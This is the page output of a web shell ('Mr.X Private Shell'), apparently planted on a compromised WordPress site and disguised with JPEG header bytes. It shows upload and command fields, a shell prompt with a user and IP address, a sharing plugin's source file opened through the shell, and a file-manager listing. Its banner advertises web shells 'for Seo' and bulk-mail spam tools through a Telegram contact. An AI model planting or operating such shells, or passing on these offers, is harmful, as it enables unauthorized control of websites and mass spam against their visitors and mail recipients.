����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.204: ~ $
<?php

/**
 * The plugin bootstrap file
 *
 * This file is read by WordPress to generate the plugin information in the plugin
 * admin area. This file also includes all of the dependencies used by the plugin,
 * registers the activation and deactivation functions, and defines a function
 * that starts the plugin.
 *
 * @link              https://www.pmthemes.com/
 * @since             1.0.0
 * @package           Pmthemes_Share
 *
 * @wordpress-plugin
 * Plugin Name:       PMThemes Sharer
 * Plugin URI:        https://www.pmthemes.com/
 * Description:       Easy to use social sharing plugin for bloggers and internet marketers.
 * Version:           1.1.0
 * Author:            PMThemes
 * Author URI:        https://www.pmthemes.com/
 * License:           GPL-2.0+
 * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
 * Text Domain:       pmthemes-share
 * Domain Path:       /languages
 */

// If this file is called directly, abort.
if ( ! defined( 'WPINC' ) ) {
	die;
}

define( 'PMTHEMES_SHARE_VERSION', '1.1.0');

/**
 * The code that runs during plugin activation.
 * This action is documented in includes/class-pmthemes-share-activator.php
 */
function activate_pmthemes_share() {
	require_once plugin_dir_path( __FILE__ ) . 'includes/class-pmthemes-share-activator.php';
	Pmthemes_Share_Activator::activate();
}

/**
 * The code that runs during plugin deactivation.
 * This action is documented in includes/class-pmthemes-share-deactivator.php
 */
function deactivate_Pmthemes_Share() {
	require_once plugin_dir_path( __FILE__ ) . 'includes/class-pmthemes-share-deactivator.php';
	Pmthemes_Share_Deactivator::deactivate();
}

register_activation_hook( __FILE__, 'activate_pmthemes_share' );
register_deactivation_hook( __FILE__, 'deactivate_pmthemes_share' );

/**
 * The core plugin class that is used to define internationalization,
 * admin-specific hooks, and public-facing site hooks.
 */
require plugin_dir_path( __FILE__ ) . 'includes/class-pmthemes-share.php';

/**
 * Automatic Update
 */
require plugin_dir_path( __FILE__ ) . 'update/update.php';
add_action( 'init', 'pmthemes_share_update' );
function pmthemes_share_update() {
	$plugin_current_version = PMTHEMES_SHARE_VERSION;
	$plugin_remote_path = 'https://hostideo.com/sharer/share.php';
	$plugin_slug = plugin_basename( __FILE__ );
	new Pmthemes_Share_Update ( $plugin_current_version, $plugin_remote_path, $plugin_slug);
}

/**
 * Begins execution of the plugin.
 *
 * Since everything within the plugin is registered via hooks,
 * then kicking off the plugin from this point in the file does
 * not affect the page life cycle.
 *
 * @since    1.0.0
 */
function run_pmthemes_share() {

	$plugin = new Pmthemes_Share();
	$plugin->run();

}
run_pmthemes_share();

Filemanager

Name Type Size Permission Actions
admin Folder 0755
core Folder 0755
images Folder 0755
includes Folder 0755
public Folder 0755
update Folder 0755
widget Folder 0755
LICENSE.txt File 18 KB 0644
index.php File 28 B 0644
pmthemes-share.php File 2.78 KB 0644
readme.txt File 1.51 KB 0644
uninstall.php File 1.05 KB 0644